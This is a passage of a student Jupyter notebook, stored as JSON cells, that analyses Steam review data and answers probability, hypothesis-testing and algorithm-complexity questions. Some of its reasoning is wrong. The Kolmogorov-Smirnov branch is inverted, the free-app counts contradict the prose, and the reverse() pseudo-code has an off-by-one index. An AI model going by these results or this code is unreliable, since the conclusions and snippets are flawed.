"['Half-Life', 'Counter-Strike: Source', 'Half-Life 2: Episode Two', 'Portal 2', \"Garry's Mod\", \"Sid Meier's Civilization V\", 'Dead by Daylight', \"Sid Meier's Civilization VI\", 'Subnautica', 'Human: Fall Flat', 'Banished', 'Celeste', 'Getting Over It with Bennett Foddy', 'A Hat in Time', 'The Forest', 'Axiom Verge', 'The Binding of Isaac: Rebirth', 'To the Moon', 'Cave Story+', 'Titan Souls', 'Super Meat Boy', \"Don't Escape: 4 Days to Survive\", 'Volgarr the Viking', 'Enter the Gungeon', 'Salt and Sanctuary', 'Hollow Knight', 'The End Is Nigh', 'Factorio', 'RimWorld', 'Insurgency: Sandstorm', 'Euro Truck Simulator 2', 'Foundation', 'Kenshi', 'Into the Breach', 'Warhammer: Vermintide 2', 'DOOM Eternal', 'Age of Empires: Definitive Edition', 'Void Bastards', 'Stardew Valley', 'Among Us', 'Blackwake', 'Little Nightmares', 'Bomber Crew', 'Rust', 'HITMAN™ 2', 'Phasmophobia', 'Mount & Blade: Warband', 'Resident Evil 2', 'Slime Rancher', 'Hotline Miami', 'Tomb Raider', 'BattleBlock Theater', 'Dishonored', 'South Park™: The Stick of Truth™', 'Undertale', \"Don't Starve\", 'Rocket League', 'Dead Cells', 'Broforce', 'The Wolf Among Us', 'The Walking Dead', 'One Finger Death Punch', 'Oxygen Not Included', 'Cuphead', 'ULTRAKILL', 'Castle Crashers', 'Townscaper', 'Papers, Please', 'GRIS', 'DUSK', 'Outlast', 'FTL: Faster Than Light', 'Dying Light', 'American Truck Simulator', 'Saints Row: The Third', 'STAR WARS™ Empire at War: Gold Pack', 'Age of Empires II (2013)', 'Super Hexagon', 'BioShock Infinite', 'DOOM', 'Black Mesa', 'Finding Paradise', 'Keep Talking and Nobody Explodes', 'Duck Game', 'Mark of the Ninja', 'Phoenix Wright: Ace Attorney Trilogy', 'Gunpoint', \"PLAYERUNKNOWN'S BATTLEGROUNDS\", 'Monster Hunter: World', 'The Elder Scrolls Online', 'Total War: WARHAMMER II', 'Cities: Skylines', 'Stellaris', 'Black Desert Online', 'Kingdom Come: Deliverance', 'Jurassic World Evolution', 'ARK: Survival Evolved', \"No Man's Sky\", 'Frostpunk', 'Fallout 4', 'DARK SOULS™ III', 'Rise of the Tomb Raider', 'Middle-earth™: Shadow of War™', 'Hearts of Iron IV', 'They Are Billions', 'Total War Saga: Thrones of Britannia', 'Total War: ROME II - Emperor Edition', 'Terraria', 'PAYDAY 2', 'XCOM 2', 'Deep Rock Galactic', 'Hunt: Showdown', 'Conan Exiles', 'Two Point Hospital', 'Total War: WARHAMMER', 'The Elder Scrolls V: Skyrim Special Edition', 'NieR:Automata™', 'House Flipper', 'Surviving Mars', 'Ni no Kuni™ II: Revenant Kingdom', 'Railway Empire', 'Rise of Industry', 'Devil May Cry HD Collection', 'Heroes of Hammerwatch', 'Ghost of a Tale', 'Ancestors Legacy', 'FAR: Lone Sails', 'Totally Accurate Battlegrounds', 'Vampyr', 'Yakuza 0', 'Thief Simulator', 'Darksiders III', 'Mutant Year Zero: Road to Eden', 'Just Cause 4', 'Planet Coaster', 'Nioh: Complete Edition', 'Europa Universalis IV', 'Just Cause 3', 'Resident Evil 7 Biohazard', 'Urban Empire', 'Youtubers Life', 'Night in the Woods', 'Northgard', 'Sniper Elite 4', 'Day of Infamy', 'SimAirport', 'Dead Rising 4', 'Styx: Shards of Darkness']\n"
]
],
[
[
"### How many applications did he/she purchase, and how many did he/she get as free? Provide the number (count) and the percentage.",
"_____no_output_____"
]
],
[
[
"# taking only the steam_purchase and received_for_free apps of the author\napp_count = dataset[dataset['author.steamid'] == pop_auth][['steam_purchase', 'received_for_free']]",
"_____no_output_____"
],
[
"# how many app did the author reviewed\ntot_app_rev = len(app_count.index)\n",
"_____no_output_____"
],
[
"purchased = dict(Counter(app_count['steam_purchase']))\nfree_apps = dict(Counter(app_count['received_for_free']))",
"_____no_output_____"
],
[
"purchased[True] = [purchased[True], \"{:.2%}\".format(purchased[True]/tot_app_rev)]\npurchased[False] = [purchased[False], \"{:.2%}\".format(purchased[False]/tot_app_rev)]\nfree_apps[True] = [free_apps[True], \"{:.2%}\".format(free_apps[True]/tot_app_rev)]\nfree_apps[False] = [free_apps[False], \"{:.2%}\".format(free_apps[False]/tot_app_rev)]",
"_____no_output_____"
],
[
"purch_df = pd.DataFrame(purchased, index=['count', 'Percentage']).T\nfree_df = pd.DataFrame(free_apps, index=['count', 'Percentage']).T",
"_____no_output_____"
],
[
"purch_df.index.name = 'App Purchased'\nfree_df.index.name = 'App given Free'",
"_____no_output_____"
],
[
"purch_df",
"_____no_output_____"
]
],
[
[
"`True` means that the apps were purchased, `False` doesn't.",
"_____no_output_____"
]
],
[
[
"free_df",
"_____no_output_____"
]
],
[
[
"`True` means that the apps were given for free, `False` doesn't.",
"_____no_output_____"
],
[
"There is a significant difference between the purchased and the free apps: the first ones were mostly purchased on Steam, and the latter only 4 apps were given for free, then this means that not every app that the author reviewed was purchased on Steam, because if we assume that all the purchased apps are counted also in the \"not given for free\" ones, then we have 35 apps purchased somewhere else, and counting also the 4 apps given for free, we have all the apps not purchased on Steam, which are 39.",
"_____no_output_____"
],
[
"### How many of the applications he/she purchased reviewed positively, and how many negatively? How about the applications he received for free?",
"_____no_output_____"
]
],
[
[
"# have to use the recommended col\napp_recomm = dataset.loc[(dataset['author.steamid'] == pop_auth) & (dataset['recommended'] == True)][['steam_purchase', 'received_for_free']]",
"_____no_output_____"
],
[
"purchased_rec = dict(Counter(app_recomm['steam_purchase']))\nfree_apps_rec = dict(Counter(app_recomm['received_for_free']))\ntot_app_rec = len(app_recomm.index)",
"_____no_output_____"
],
[
"print('{} applications purchased were reviewed positively, and {} were reviewed negatively'\n .format(purchased_rec[True], purchased_rec[False]))\nprint('{} applications given for free were reviewed positively, and {} were reviewed negatively'\n .format(free_apps_rec[True], free_apps_rec[False]))",
"108 applications purchased were reviewed positively, and 38 were reviewed negatively\n4 applications given for free were reviewed positively, and 142 were reviewed negatively\n"
]
],
[
[
"Comparing these results with the ones in the previous question, we can see that 3 apps were not recommended positively nor negatively, and those are, using the same hypothesis of the previous answer, 2 purchased on Steam and 1 purchased elsewhere. Also we can see that all apps given for free where recommended positively, which means that the author liked playing with them (and we assume that he/she also liked their quality of being \"free\")",
"_____no_output_____"
],
[
"# RQ6 \n",
"_____no_output_____"
],
[
"### What is the average time (days and minutes) a user lets pass before he updates a review?",
"_____no_output_____"
],
[
"Just to start we have computed the difference between the time when the review is written and time when the review is updated and then we have transformed this difference in terms of days",
"_____no_output_____"
]
],
[
[
"dataset['difference_days'] = (dataset['timestamp_updated'] - dataset['timestamp_created'])\ndataset['difference_days'] = dataset['difference_days']/np.timedelta64(1,'D')",
"_____no_output_____"
]
],
[
[
"After that we have deleted who did not update his review because we have thought that is meaningless consider them. Then we have computed the mean between days and the integer part of this number represents the average number of days after an author updates his review. Instead to transform the decimal part in minutes we have to multiply it for 1440 because in one day there are 1440 minutes. We have made a simple proportion: *1 : 1440 = x : (decimal part of our number)*",
"_____no_output_____"
]
],
[
[
"dataset_1 = dataset[dataset.difference_days != 0]\naverage = dataset_1.difference_days.mean()\nminutes = round((average % 1) * 1440, 0)\ndays = average // 1\nprint(\"The average time a user lets pass before he updates a review is \"+\n '\\033[1m' + str(days) + '\\033[0m' + \" days and \" + '\\033[1m' + str(minutes) + '\\033[0m' + \" minutes\")",
"The average time a user lets pass before he updates a review is \u001b[1m321.0\u001b[0m days and \u001b[1m46.0\u001b[0m minutes\n"
]
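,
[
"Equivalently, the days/minutes split can be read directly from the mean timedelta itself. The following is only a hedged sketch of this alternative (it assumes the `dataset_1` dataframe defined above); up to rounding it gives the same result as the proportion used above.\n\n```python\n# hedged sketch: average update delay read from a pandas Timedelta\nmean_delay = (dataset_1['timestamp_updated'] - dataset_1['timestamp_created']).mean()\ndays = mean_delay.days              # whole days\nminutes = mean_delay.seconds // 60  # remaining part of the day, expressed in minutes\n```",
"_____no_output_____"
]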
],
[
[
"On average an author updates his review almost after a year! ",
"_____no_output_____"
],
[
"### Plot the top 3 authors that usually update their reviews.",
"_____no_output_____"
],
[
"We have used the dataframe **dataset_1** in which there are only the reviews that have been updated. We did not use the starting dataset because we have to extract who are the authors that usually update their reviews so authors that have updated more reviews through time.",
"_____no_output_____"
]
],
[
[
"a = pd.Series(dataset_1.groupby('author.steamid').review_id.count().sort_values(ascending=False).head(3))\na",
"_____no_output_____"
],
[
"#bar plot\nplt.figure(figsize=(12, 8))\nax = a.plot(kind=\"bar\", color = [\"orchid\", \"orange\", \"green\"], alpha=0.75, rot=0)\nax.set_title(\"TOP 3 authors that have updated more reviews\")\nax.set_xlabel(\"Steam ID\")\nax.set_ylabel(\"Number of reviews updated\")\n#needed to put values on top of the bar\nfor i, v in enumerate(a.values):\n ax.text(i, v+1, str(v), color='black', fontweight='bold')",
"_____no_output_____"
]
],
[
[
"We have put the number of reviews over the bars because the second and the third author have updated almost the same number of reviews.",
"_____no_output_____"
],
[
"# RQ7",
"_____no_output_____"
],
[
"### What’s the probability that a review has a Weighted Vote Score equal to or bigger than 0.5?",
"_____no_output_____"
],
[
"We have used the definition of probability to compute these values indeed we have count the number of reviews that has a Weighted Vote Score equal to or bigger than 0.5 and this number represents the favourable case (we have stored this number in **casi_fav**)while the number of total case is represented by the number of the lines of our dataset, stored in **casi_tot**. The probability is the ratio between them. ",
"_____no_output_____"
]
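,
[
"Since the ratio between favourable and total cases is just the proportion of rows satisfying the condition, the same number can be obtained as the mean of a boolean mask. This is only a hedged equivalent sketch (same `dataset` as above).\n\n```python\n# hedged sketch: P(weighted_vote_score >= 0.5) as the mean of a boolean mask\np_high_score = (dataset['weighted_vote_score'] >= 0.5).mean()\n```",
"_____no_output_____"
]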
],
[
[
"#filter the dataset picking only weighted_vote_score >= 0.5\n#and count the rows of filter dataset\ncasi_fav = dataset[dataset.weighted_vote_score >= 0.5].weighted_vote_score.count()",
"_____no_output_____"
],
[
"#number of rows of initial dataset\ncasi_tot = dataset.weighted_vote_score.count()",
"_____no_output_____"
],
[
"result_1 = round(casi_fav/casi_tot, 2)\nprint(\"The probability is of a review has a Weighted Vote Score equal to or bigger than 0.5 is \"+ '\\033[1m' +str(result_1)+'\\033[0m')",
"The probability is of a review has a Weighted Vote Score equal to or bigger than 0.5 is \u001b[1m0.22\u001b[0m\n"
]
],
[
[
"### What’s the probability that a review has at least one vote as funny given that the Weighted Vote Score is bigger than 0.5?",
"_____no_output_____"
],
[
"We want to compute this conditional probability P(B|A) where B is the event: *a review has at least one vote as funny*. The sample space will be reduced, indeed we have filtered the dataset in such way that we are going to look for reviews with at least one vote as funny just among reviews with Weighted Vote Score is bigger than 0.5.",
"_____no_output_____"
]
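,
[
"The same conditional probability can be written directly as a ratio of boolean-mask counts. The snippet below is only a hedged sketch equivalent to the cells that follow (same `dataset` as above).\n\n```python\n# hedged sketch: P(B|A) with boolean masks\nA = dataset['weighted_vote_score'] > 0.5  # conditioning event\nB = dataset['votes_funny'] != 0           # at least one funny vote\np_b_given_a = (A & B).sum() / A.sum()\n```",
"_____no_output_____"
]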
],
[
[
"#new sample space: filter dataset like before\n# A\ndataset_prob = dataset[dataset.weighted_vote_score > 0.5]",
"_____no_output_____"
],
[
"#count the reviews with at least a funny vote in the new filter dataset\n#B intersect A\ncasi_fav_2 = dataset_prob[dataset_prob.votes_funny != 0].votes_funny.count()",
"_____no_output_____"
],
[
"#A\ncasi_tot2 = dataset_prob.weighted_vote_score.count()\n#P(B|A)\nresult_2 = round(casi_fav_2/casi_tot2, 2)\nprint(\"The conditional probability that a review has at least one vote as funny given that the Weighted Vote Score is bigger than 0.5 is \",'\\033[1m' +str(result_2)+'\\033[0m')",
"The conditional probability that a review has at least one vote as funny given that the Weighted Vote Score is bigger than 0.5 is \u001b[1m0.25\u001b[0m\n"
]
],
[
[
"### Is the probability that “a review has at least one vote as funny” independent of the “probability that a review has a Weighted Vote Score equal or bigger than 0.5\"?",
"_____no_output_____"
],
[
"To be independent these two events it would happen that the probability of the event B: *a review has at least one vote as funny* would be equal to *probability that a review has at least one vote as funny given that the Weighted Vote Score is equal or bigger than 0.5, that is P(B|A);* because in this way the conditioning of the two probability is useless given that they are independent.",
"_____no_output_____"
],
[
"To be independent these two events it would happen that the P(B) would be equal to P(B|A) because in this way the conditioning of the two probability is useless given that they are independent: P(B|A) = P(B).",
"_____no_output_____"
]
],
[
[
"#P(B|A)\ncasi_fav_ba = dataset[(dataset.weighted_vote_score >= 0.5) & (dataset.votes_funny != 0)].votes_funny.count()\nresult_3a = round(casi_fav_ba/casi_fav, 2)\nprint(\"The conditional probability that a review has at least one vote as funny given that the Weighted Vote Score is equal or bigger than 0.5 is \",'\\033[1m' +str(result_3a)+'\\033[0m')",
"The conditional probability that a review has at least one vote as funny given that the Weighted Vote Score is equal or bigger than 0.5 is \u001b[1m0.25\u001b[0m\n"
],
[
"#count the reviews with at least a funny vote in the starting dataset\n#B\ncasi_fav_3 = dataset[dataset.votes_funny != 0].votes_funny.count()",
"_____no_output_____"
],
[
"#P(B)\nresult_3 = round(casi_fav_3/casi_tot,2)\nprint(\"The probability of a review has at least one vote as funny is \"+ '\\033[1m' +str(result_3)+'\\033[0m')",
"The probability of a review has at least one vote as funny is \u001b[1m0.12\u001b[0m\n"
]
],
[
[
"0.12 is different from 0.25 so these two events are **dependent!**",
"_____no_output_____"
],
[
"# RQ8",
"_____no_output_____"
],
[
"### Is there a significant difference in the Weighted Vote Score of reviews made in Chinese vs the ones made in Russian? Use an appropriate statistical test or technique and support your choice.",
"_____no_output_____"
],
[
"We'll use a non-parametric(Kolgomoronov-Smirnov) test in order to find if the 2 distribution are the same(comes from the same population) or not, since the 2 distributions are not normally distributed",
"_____no_output_____"
]
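,
[
"The claim that the two samples are not normally distributed can itself be checked quickly. This is only a hedged sketch (it assumes the same `dataset` as above and that `scipy.stats` is available, as it must be for the `ks_2samp` call used below).\n\n```python\n# hedged sketch: normality check of the two weighted_vote_score samples\nfrom scipy.stats import normaltest\nfor lang in ['schinese', 'russian']:\n    sample = dataset[dataset.language == lang]['weighted_vote_score']\n    stat, p = normaltest(sample)\n    print(lang, 'normality test p-value:', p)  # a tiny p-value argues against normality\n```",
"_____no_output_____"
]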
],
[
[
"data_lang = functions.get_reviews_by_languages(dataset,[\"schinese\",\"russian\"])",
"_____no_output_____"
]
],
[
[
"First at all we compare chinese weighted score distribution and russian weighted score distribution using histograms. At first glance there does not seem to be any significant differences between the two distribution. From this plot those 2 distributions seems that distributes equally.",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize = (10,8))\ndata_lang[data_lang.language == \"schinese\"].weighted_vote_score.plot(kind = \"hist\", label = \"Chinese\",alpha = 0.3)\ndata_lang[data_lang.language == \"russian\"].weighted_vote_score.plot(kind = \"hist\", label = \"Russian\", color = \"orange\",alpha = 0.3)\nplt.legend()",
"_____no_output_____"
]
],
[
[
"So we can support the choice with a statistaical test.Let's check with the KS test",
"_____no_output_____"
]
],
[
[
"k_smir_test = ks_2samp(data_lang[data_lang.language == \"schinese\"].weighted_vote_score,\n data_lang[data_lang.language == \"russian\"].weighted_vote_score)\nif k_smir_test.pvalue <= 0.1:\n print(\"the two distributions are identical.\")\nelse:\n print(f\"the 2 distributions are different with a pvalue of {k_smir_test.pvalue}\")",
"the two distributions are identical.\n"
]
],
[
[
"The Kolmogorov-Smirnov test is a non-parametric test that checks the shape of sample distributions. It can be used to compare two samples and It does not in itself require any assumptions about the sample distribution, like in our case. The acceptance of the H0 hypothesis predicts that the two distributions belong to the same population.",
"_____no_output_____"
],
[
"### Can you find any significant relationship between the time that a user lets pass before he updates the review and the Weighted Vote Score? Use an appropriate statistical test or technique and support your choice.",
"_____no_output_____"
],
[
"We'll discover if there is a relationship into 3 step:\n * plot\n * pearson correlations\n * Linear Regression",
"_____no_output_____"
]
],
[
[
"# step 1: plot\nplt.figure(figsize = (10,8))\nplt.scatter(dataset.difference_days, dataset.weighted_vote_score)\nprint(\"no relationship visible\")",
"no relationship visible\n"
],
[
"# step 2: pearson correlation\nprint(pearsonr(dataset.difference_days, dataset.weighted_vote_score))\nprint(\"no relations detected \")",
"(0.07204700562113138, 0.0)\nno relations detected \n"
],
[
"X = dataset[[\"difference_days\"]]\nX = sm.add_constant(X).values\nmodel = sm.OLS(dataset.weighted_vote_score, X)\nres = model.fit()",
"_____no_output_____"
],
[
"res.summary()",
"_____no_output_____"
]
],
[
[
"using Simple Linear Regression (1 X variable) is the same that using pearsonr because\n$R^{2}Score = (pearsonr)^2 $",
"_____no_output_____"
]
],
[
[
"p = pearsonr(dataset.difference_days, dataset.weighted_vote_score)\nprint(f\"pearsonr {p[0]}\\npearsonr^2 = {p[0]**2} -> same as R-squared detected above\")",
"pearsonr 0.07204700562113138\npearsonr^2 = 0.005190771018971337 -> same as R-squared detected above\n"
]
],
[
[
"The second test is linear regression: also in this case there is no evidence that between two variables there is a sort of correlation.",
"_____no_output_____"
],
[
"### Is there any change in the relationship of the variables mentioned in the previous literal if you include whether an application is recommended or not in the review? Use an appropriate statistical test or technique and support your choice.",
"_____no_output_____"
],
[
"just adding another variable into Linear Regression",
"_____no_output_____"
]
],
[
[
"X = dataset[[\"difference_days\",\"recommended\",\"weighted_vote_score\"]].astype({\"recommended\":int})\nmodel = smf.ols(\"weighted_vote_score ~ difference_days + C(recommended)\", data=X)\nres = model.fit()\nres.summary()",
"_____no_output_____"
]
],
[
[
"no changes in relationships",
"_____no_output_____"
],
[
"### What are histograms, bar plots, scatterplots and pie charts used for?",
"_____no_output_____"
],
[
"Histogram: This type of data visualization helps to interpret univariate analysis results. Simply put, it shows where data points are dense and where they are sparse in one dimension. However, instead of comparing the categorical data, it breaks down a numeric data into interval groups and shows the frequency of data fall into each group. Histogram is good at identifying the pattern of data distribution on a numeric spectrum.\n\nBar Chart: Bar chart compares the measure of categorical dimension. Bar chart is very similar to a histogram. The fundamental difference is that the x-axis of bar charts is categorical attribute instead of numeric interval in the histogram. Furthermore, bar chart is not just limited to plot one categorical data. An extension of bar chart, clustered bar chart (or group bar chart) compares two categorical attributes.\n\nScatterplot: It plots one numeric attribute against another numeric attribute and visualizes the correlation between axes. Scatter plot is commonly applied to identify regression type of relationships such as linear regression, logistic regression etc. It also provides a robust analysis of the correlation significance. We can estimate that the correlation relationship is stronger,linearly, when the data points lying on a line with a certaing degree, whereas the relationship is weak if the line is flat.\n\nPiechart: It is used to represent the percentage and weight of components belonging to one categorical attribute. The size of the pie slice is proportional to the percentage, hence it intuitively depicts how much each component occupies the whole.",
"_____no_output_____"
],
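[
"As a small illustration of the four plot types described above, the following hedged sketch draws each of them on toy data (it only assumes `matplotlib.pyplot` and `numpy`, which are already imported in this notebook).\n\n```python\n# hedged sketch: histogram, bar chart, scatter plot and pie chart on toy data\nvalues = np.random.randn(500)\nfig, axes = plt.subplots(2, 2, figsize=(10, 8))\naxes[0, 0].hist(values, bins=20)                               # histogram: distribution of a numeric variable\naxes[0, 1].bar(['a', 'b', 'c'], [5, 3, 7])                     # bar chart: a measure per category\naxes[1, 0].scatter(values, 2 * values + np.random.randn(500))  # scatter plot: relation between two numeric variables\naxes[1, 1].pie([40, 35, 25], labels=['a', 'b', 'c'])           # pie chart: shares of a whole\nplt.tight_layout()\n```",
"_____no_output_____"
],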
[
"### What insights can you extract from a Box Plot?",
"_____no_output_____"
],
[
"A boxplot shows the distribution of the data with more detailed information. from Box Plot we can \"extract\" information such as outliers, maximum, minimum, first quartile(Q1), third quartile(Q3), interquartile range(IQR), and median. It also gives you the information about the skewness of the data, how tightly closed the data is and the spread of the data.",
"_____no_output_____"
],
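[
"As a quick illustration, the quantities listed above can be computed directly and compared with what `plt.boxplot` draws. This is only a hedged sketch on toy data.\n\n```python\n# hedged sketch: the summary statistics behind a box plot\nsample = np.random.randn(1000)\nq1, median, q3 = np.percentile(sample, [25, 50, 75])\niqr = q3 - q1\nwhisker_low, whisker_high = q1 - 1.5 * iqr, q3 + 1.5 * iqr  # typical whisker rule\nplt.boxplot(sample)  # points beyond the whiskers are drawn as outliers\n```",
"_____no_output_____"
],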
[
"# TQ1\n## Question 1\nAs known, given a random variable $X$, the Quantile function *Q($\\cdot$)* with support $\\{ p | p \\in [0,1] \\}$ is the function that computes:\n\n\\begin{equation}\nQ(p)=s \\hspace{0.2 cm} |\\hspace{0.2 cm} \\mathcal{P}(X<=s) = p\n\\end{equation}\n\nDenoting with $A_i$ the i-th element of the vector $A$ of length $n$ and given $k \\in [0,n]$, it is possible to see that our algorithm compute:<br>\n\n\\begin{equation}\n alg(A,k)=s \\hspace{0.2 cm} |\\hspace{0.2 cm} \\#\\{A_i<=s\\} = k\n\\end{equation}\n\nIt is then easily possible to perform some trasformations over our algorithm parameters in order to obtain the similarities with the quantile function, i.e.:\n\n1. A shrinkage over our algorithm support space (i.e. $k'=k/n$);\n\n2. A shrinkage over our cardinality measure (i.e. $\\#\\{A_i<=s \\}'=\\frac{\\#\\{A_i<=s \\}}{n}$);\n\nSubstituting into our $alg(A,k)$ it becomes:\n\\begin{equation}\n alg(A,k')=s\\hspace{0.2 cm} |\\hspace{0.2 cm} \\frac{\\#\\{A_i<=s\\}}{n} = k'\n\\end{equation}\nIn a frequentist approach (said $A_r$ a random sample of the vector $A$) we can equal $\\frac{\\#\\{A_i<=s\\}}{n}= \\mathcal{P}(A_r <= s)$; In words, our algorithm is computing the value $s$ so that the number of elements in the array $A$ smaller or equal to $s$ will be equal to $k$: we can so somehow define our algorithm a \"quantile function over a non-normalized support\".\n## Question 2\nWe initially note that the subdivision of the array $A$ (over which we are calling $alg()$) into $L$ and $R$ requires to scan the whole vector $A$ (i.e. requires $n=len(A)$ operations). Let consider the worst case scenario, i.e. imagine that $k=n$ and that at each iteration the random sample $s$ will always be equal to $A_1$: it basically means that the $s$ satisfying the condition over $k$ will be selected at the $n_{th}-1$ call of $alg()$ (iteration at which the vector $A$ over which we are calling $alg()$ has lenght equal to 2). We are so going to remove at each call of $alg()$ a single element, i.e. the smallest element in $A$. Due to this, the number of operations needed to scan the vector $A$ will decrease of one unit at each iteration of $alg()$. So we have that:\n $$\n T(n)=n+(n-1)+(n-2)+(n-3)+...+(n-(n-1)) = \\sum_{i=0}^{i=n-1}(n-i)=\\frac{1}{2}n(n-1)\n $$ \n(We recall that the sum is executed over $n-1$ iteration because we need $n-1$ call of $alg()$ to reach the right $s$). We can so assume an asymptotical complexity in the worst case scenario (removing costant therms) equal to $\\mathcal{O}(n^2)$.\n## Question 3\nIn the best case scenario, the right $s$ will be picked up at the first iteration: we only need $n$=len($A$) operation to scan $A$ and divide it into $L$ and $R$ : the asymptotical complexity will then be equal to $\\mathcal{O}(n)$.",
"_____no_output_____"
],
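[
"To make the link with the quantile function concrete: for distinct values, the element returned by the algorithm is simply the k-th smallest element of $A$, i.e. the empirical quantile of order $k/n$. The snippet below is only a hedged illustration of this correspondence, not part of the required algorithm.\n\n```python\n# hedged sketch: alg(A, k) behaves like a quantile over a non-normalized support\nA = np.random.randint(0, 100, size=16)\nk = 4\ns = np.sort(A)[k - 1]  # for distinct values, exactly k elements of A are <= s\np = k / len(A)         # the corresponding (normalized) quantile level\n```",
"_____no_output_____"
],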
[
"# TQ2\n## Question 1\nLet dive into the interpretation of the given recursive algorithm's complexity. It is clear that, given a particular $n$ and $\\forall l$, and expressing with $T(n)$ the time needed to complete the algorithm called with parameter $n$:\n\n\\begin{equation}\n T(n) = T\\left(\\frac{n}{2}\\right)\\cdot 2 + \\left(\\frac{n}{2}+1\\right)\\cdot 3\n\\end{equation}\n\nIndeed, calling **splitSwap(a,l,n)** we will have to solve two times **splitSwap(a,l,n/2)** plus execute 3 operations for each of the $\\left(\\frac{n}{2}+1\\right)$ iterations of the for loop into **swapList(a,l,n)**. Lets compute running times after the expression of $T(n)$:\n\n\\begin{equation}\n T\\left(\\frac{n}{2}\\right) = T\\left(\\frac{n}{2^2}\\right)\\cdot 2 + \\left(\\frac{n}{2^2}+1\\right)\\cdot 3\n\\end{equation}\n\n\\begin{equation}\n T(n) = T\\left(\\frac{n}{2^2}\\right)\\cdot 2^2 + \\left(\\frac{n}{2^2}+1\\right)\\cdot2 \\cdot 3 +\\left(\\frac{n}{2}+1\\right)\\cdot 3\n\\end{equation}\n\n\\begin{equation}\n T(n) = T\\left(\\frac{n}{2^2}\\right)\\cdot 2^2 + \\left(\\frac{n}{2}+1\\right)\\cdot2 \\cdot 3 +3\n\\end{equation}\n\n\\begin{equation}\n T\\left(\\frac{n}{2^2}\\right) = T\\left(\\frac{n}{2^3}\\right)\\cdot 2 + \\left(\\frac{n}{2^3}+1\\right)\\cdot 3\n\\end{equation}\n\n\\begin{equation}\n T(n) = T\\left(\\frac{n}{2^3}\\right)\\cdot 2^3 + \\left(\\frac{n}{2}+1\\right)\\cdot 3 \\cdot 3 +7\n\\end{equation}\n\n\\begin{equation}\n T(n) = T\\left(\\frac{n}{2^k}\\right)\\cdot 2^k + \\left(\\frac{n}{2}+1\\right)\\cdot k \\cdot 3 +log_2(2^k)-1\n\\end{equation}\n\nSetting $2^k=n \\Leftrightarrow k =log_2(n)$ we obtain:\n\n\\begin{equation}\n T(n) = T(1)\\cdot n + \\left(\\frac{n}{2}+1\\right)\\cdot log_2(n) \\cdot 3 +log_2(n)-1 \\simeq n\\cdot log_2(n)\n\\end{equation}\n\nIn the latter we have removed the dependency from factors, constant terms and considered only the term with the biggest growth rate w.r.t $n$. We can than say that the asymptotical complexity of the algorithm is $\\mathcal{O}(n\\cdot log_2(n))$.\n\n## Question 2\nGiven an array **a**, an index **l** and a number **n** (considering the scenario where both **len(a)** and **n** are power of 2 numbers), the algorithm output the array **a'** built as follows:\n\n\\begin{equation}\n a'[i]=a[i] \\hspace{1cm}\\forall i \\in [0,1,...,l-1]\\hspace{1cm}\\mbox{if}\\hspace{1cm} l \\geq 1\n\\end{equation}\n\n\\begin{equation}\n a'[l+i]=a[l+n-i]\n\\end{equation}\n\nIn words, starting from an index **l** of the original array **a**, the algorithm is reversing the position of the first **n** elements of the array. Because of this of course it is required that **l+n** $\\leq$ **len(a)**, otherwise the subroutine **swapList()** will raise an error because of the out-of-range index it loops on. Let describe the algorithm's mechanism. Looking at the code, we can assess how the only part of the code actually changing the position of the array's elements is the subroutine **swapList()**. Given a triplet **(a,l,n)**, once **splitSwap()** is called, it will recursively call himself with an **n** halfed call by call (i.e. **n**$^{(1)}$ =**n/2**, **n**$^{(2)}$ =**n**$^{(1)}/2$, **n**$^{(3)}$ =**n**$^{(2)}/2$ and so on). 
As we can see in the (Fig.1), after $\\text{log}_2(n)-1$ steps, the function **splitSwap(a,l,2)** will be called: in its execution both **splitSwap(a,l,1)** and **splitSwap(a,l+1,1)** will **return** (being **n**=1), finally allowing the execution of **swaplist(a,l,2)** (that we will call **final-node-subroutine** $\\forall l$) that will exchange the position of the array's elements **a[l]** with **a[l+1]**. Being **splitSwap(a,l,2)** completed, **splitSwap(a,l+2,2)** will be called. Similary, at the end of the execution its **final-node-subroutine** will exchange the position of the array's elements **a[l+2]** with **a[l+3]**. Basically the **final-node-subroutines** consider the array (starting from the element $a[l]$) as a sequence of $\\frac{n}{2}$ couples of elements and in each couple they exchange the 1st element with the 2nd one.\n\nRecalling that **splitSwap(a,l,2)** and **splitSwap(a,l+2,2)** where called in **splitSwap(a,l,4)**, **swapList(a,l,4)** (that we will call **semi-final-node-subroutine**) will finally be executed, exchanging the position of the array's elements **a[l]** with **a[l+2]** and **a[l+1]** with **a[l+3]**. So the role of **semi-final-node-subroutines** is to consider the array (starting from the element $a[l]$) as a sequence of $\\frac{n}{4}$ couples of couples and to exchange the position of the 1st element of the 1st couple with the 1st element of the 2nd couple, and the 2nd element of the 1st couple with the 2nd element of the 2nd couple. Basically, after the execution of all the **final-node-subroutines** and of the **semi-final-node-subroutines** the position of the 1st group of 4 elements of the original array will be reversed, the same for the 2nd group of 4 elements and so on. We can so climb our recursive function tree from the **final-node-subroutines** up to the top **first-final-node-subroutine** i.e. **swapList(a,l,n)**. We can see the effect of each kind of **subroutine** level over a test array in two examples at (Fig.2,3) recalling that the output of the **first-final-node-subroutine** will be equal to the algorithm's output.\n\nHaving assessed that the algorithm complexity is $\\simeq O(n\\cdot log_2(n))$, it is possible to confirm that the algorithm it's not optimal: infact it is easily possible to write some pseudo-code with a lower complexity than the given algorithm:\n\n```python\ndef reverse(a,l,n):\n reversed_array=a\n for i in range(n):\n reversed_array[i+l]=a[l+n-i]\n return reversed_array\n```\n\nWe can easily see that the **reverse()** algorithm complexity has now become (removing costant therms and factors) $O(n)$, proving that the **splitSwap()** algorithm was not optimal.",
"_____no_output_____"
],
[
"In order:<br>\nFig.1 :Reaching the first final-node-subroutine<br>\nFig.2 :Test over a with len(a)=n=16, l=0<br>\nFig.3 :Test over a with len(a)=16, n=8, l=7<br>",
"_____no_output_____"
],
[
"\n<figcaption align=\"center\"> Fig.1 :Reaching the first final-node-subroutine</figcaption>",
"_____no_output_____"
],
[
"=n=16, l=0\")\n<figcaption align=\"center\"> Fig.2 :Test over a with len(a)=n=16, l=0</figcaption>",
"_____no_output_____"
],
[
"=16, n=8, l=7\")\n<figcaption align=\"center\"> Fig.3 :Test over a with len(a)=16, n=8, l=7</figcaption>",
"_____no_output_____"
],
[
